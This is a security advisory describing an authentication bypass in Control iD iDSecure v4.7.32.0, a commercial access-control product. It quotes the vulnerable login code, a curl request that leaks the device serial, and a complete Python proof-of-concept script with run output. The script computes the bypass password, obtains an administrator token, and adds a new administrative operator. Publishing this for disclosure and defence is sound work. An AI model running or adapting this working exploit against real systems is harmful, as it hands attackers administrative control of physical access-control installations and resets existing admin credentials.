Control iD iDSecure passwordCustom Authentication Bypass

An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user.

iDS-Core.dll!ControliD.iDSecure.Tools.ServerJWT.Login() allows login via "passwordCustom":
        public LoginResult Login(LoginRequest client)
        {
           [...]
                if (client.passwordCustom == null)
                {
              [...]
                }
                else
                {
                    if (!(client.passwordCustom == Operators.DesbloqueioGerenciador(ServerJWT.Serial, client.passwordRandom)))
                    {
                        throw new DALException(Localization.Translate("InvalidPassword"));
                    }
                    operators = DAL.LoadBy<Operators>("user", "admin");
                    if (operators == null)
                    {
                        Operators operators2 = new Operators();
                        operators2.user = "admin";
                        operators2.name = "Administrador";
                        operators2.newPassword = "admin";
                        operators2.idType = 1;
                        operators = operators2;
                        DAL.Save<Operators>(operators2, 0L, false, false);
                    }
                    else
                    {
                        operators.newPassword = "admin";
                        operators.idType = 1;
                        DAL.Save<Operators>(operators, 0L, false, false);
                    }
              [...]

The passwordCustom value is computed from a user-supplied passwordRandom value and ServerJWT.Serial, which can be obtained by an unauthenticated remote attacker:

curl -sk '<https://<target-host>:30443/api/login/unlockGetData'>
{"passwordRandom":"redacted","serial":"redacted"}

With the disclosed ServerJWT.Serial value, the attacker can compute a correct passwordCustom value to authenticate to iDSecure as an administrative operator.

After successful login, a new operator with username 'admin' is created with the password set to 'admin'. If the 'admin' operator already exists the user password is reset to 'admin'.

Proof of Concept

import requests, sys, argparse, json, random, hashlib
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
descr  = 'Control iD iDSecure Authentication Bypass'
parser = argparse.ArgumentParser(descr)
required = parser.add_argument_group('required arguments')
required.add_argument('-t', '--target',required=True, dest='target',help='Target host')
parser.add_argument('-p', '--port', dest ='port',type=int, default=30443, help='Target port, default: %(default)s')
args = parser.parse_args()
host  = args.target
port  = args.port
print('[*] Getting serial number')
url = f'https://{host}:{port}/api/login/unlockGetData'
r = requests.get(url, verify=False)
j = r.json()
if r.status_code == 200 and 'serial' in j:
  serial = j['serial']
  print(f'[+] Serial: {serial}')
else:
  sys.exit('[-] Failed to get serial number')
passwordRandom = str(random.randrange(0xffffffff))
print(f'[*] Pick a passwordRandom: {passwordRandom}')
m = hashlib.sha1(serial.encode()).hexdigest()
m = hashlib.sha256((m + passwordRandom + 'cid2016').encode()).hexdigest()[0:6]
passwordCustom = str(int(m, 16))
print(f'[*] Computed passwordCustom: {passwordCustom}')
print(f'[*] Logging in with passwordCustom and passwordRandom')
url = f'https://{host}:{port}/api/login/'
data  = {
  'passwordCustom'  : passwordCustom,
  'passwordRandom'  : passwordRandom
}
r = requests.post(url, json=data, verify=False) 
j = r.json()
if 'accessToken' in j and j['accessToken'] != None:
  accessToken = j['accessToken']
  print(f'[+] Got JWT accessToken: {accessToken}')
else:
  sys.exit('[-] Failed to get a JWT accessToken.\n' + r.text) 
endpoint = '/api/operator/'
username = 'operator'
password = 'Password123'
print(f'[*] Adding a new administrative operator "{username} / {password}" using the obtained accessToken')
url = f'https://{host}:{port}{endpoint}'
headers = {'Authorization': 'Bearer ' + accessToken}
data  = {
  "idType"        : "1",
  "name"          : username,
  "user"          : username,
  "newPassword"   : password,
  "password_confirmation":password
}
r = requests.post(url, headers=headers, json=data,verify=False) 
print('\n')
print(f'{r.status_code} {r.reason}')
print(r.text)

python3 control_id_idsecure_auth_bypass.py -t <target-host> -p 30443
[*] Getting serial number
[+] Serial: redacted
[*] Pick a passwordRandom: redacted
[*] Computed passwordCustom: redacted
[*] Logging in with passwordCustom and passwordRandom
[+] Got JWT accessToken: redacted
[*] Adding a new administrative operator "operator / Password123" using the obtained accessToken